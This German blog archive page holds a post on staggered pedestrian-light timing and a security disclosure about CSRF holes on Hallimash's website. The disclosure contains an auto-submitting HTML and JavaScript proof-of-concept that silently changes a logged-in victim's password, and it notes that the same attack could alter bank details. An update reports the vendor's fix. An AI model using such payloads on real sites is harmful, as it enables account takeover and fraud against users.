Archive: Month 8, Year 2010

Die Fußgänger-Ampel...

19.08.2010 yahe legacy thoughts

Es hat mich immer schon geärgert, dass bei getrennten Fahrspuren (z.B. durch eine Verkehrsinsel) eine Straßenseite der Fußgängerampeln immer eher grün bekommt als die andere. Und man selber steht natürlich immer auf der falschen Seite und muss den anderen Fußgängern dabei zugucken, wie sie einem bereits entgegen laufen, während man selbst noch auf sein Grün wartet. Aber warum ist das so? Warum werden bei einer breiten Straße nicht beide Laufrichtungen gleichzeitig auf grün geschaltet? Die Antwort darauf ist verblüffend!

Um die Situation, die damit vermieden wird, mal darzustellen, habe ich eine typische Kreuzung aufgemalt. Die Autos, die von links nach rechts fahren, haben gerade rot bekommen und die, die von oben nach unten fahren, kriegen gleich grün. Die Fußgänger dürfen natürlich zuerst loslaufen. In unserem fiktiven Beispiel dürfen alle Fußgänger gleichzeitig loslaufen. Und da passiert auch schon das Unglück! Ein von rechts kommender Autofahrer war bei Gelb noch schnell über die Ampel gefahren und rast nun direkt auf die Fußgänger zu, die bereits auf die Straße gelaufen sind. Eine gefährliche Situation!

Die Fußgängerampel

Um genau diese gefährliche Situation zu vermeiden, dürfen die Fußgänger, die aus der Sicht der Autofahrer hinter der Kreuzung über die Straße laufen, erst später losgehen als die Fußgänger, die vor der Kreuzung die Straße überqueren. Dadurch haben alle Autos die Kreuzung bereits verlassen, bevor die gefährdeten Fußgänger die Straße betreten dürfen.


Hallimash ist genauso schlimm wie Trigami

08.08.2010 yahe legacy security thoughts

Nachdem ich mir letzes Mal Trigami angesehen habe, soll es heute um deren Konkurrenten "Hallimash" gehen. Denn auch deren Webseite enthält "CSRF"-Lücken (Cross-Site Request Forgery):

<form action="/index.php?b=passwort&nav=2" method="POST">
  <input type="password" name="pw1" value="" maxlength="20" style="width:200px;" class="text">
  <input type="password" name="pw2" value="" maxlength="20" style="width:200px;" class="text">
  <input type="image" src="images/btn/speichern.jpg">
  <input type="hidden" name="sent" value="on">
</form>

Natürlich funktioniert der hier gezeigte Angriff in abgewandelter Form auch wieder wunderbar, um die Kontoverbindungsdaten eines Opfers zu ändern, bei denen man, wenn man ehrlich ist, frühestens bei einem Abrechnungsproblem mal hineinsehen wird.

<form method="POST" id="hallimashpwd" name="hallimashpwd" action="http://www.hallimash.com/index.php?b=passwort&nav=2">
  <input type="password" name="pw1" value="neuesPasswort" maxlength="20" style="width:200px;" class="text">
  <input type="password" name="pw2" value="neuesPasswort" maxlength="20" style="width:200px;" class="text">
  <input type="submit" name="submitButton">
  <input type="hidden" name="sent" value="on">
</form>
<script type="text/javascript">
  document.hallimashpwd.submitButton.click();
</script>

Auch hier gilt wieder einmal der Tipp, nur eingeloggt zu bleiben, wenn man gerade etwas auf der Seite machen will. Danach sollte man sich sofort wieder ausloggen, um solche Angriffe zu umgehen.

Update

Wie mir von Hallimash mitgeteilt wurde, haben sie das Problem nun beseitigt. Ein Blick auf die Webseite zeigt, dass sie nun eindeutige Tokens generieren, um die gezeigte Art Angriffe zu unterbinden.


Search

Links

RSS feed

Categories

administration (40)
arduino (12)
calcpw (2)
code (33)
hardware (16)
java (2)
legacy (113)
linux (27)
publicity (6)
review (2)
security (58)
thoughts (21)
windows (17)
wordpress (19)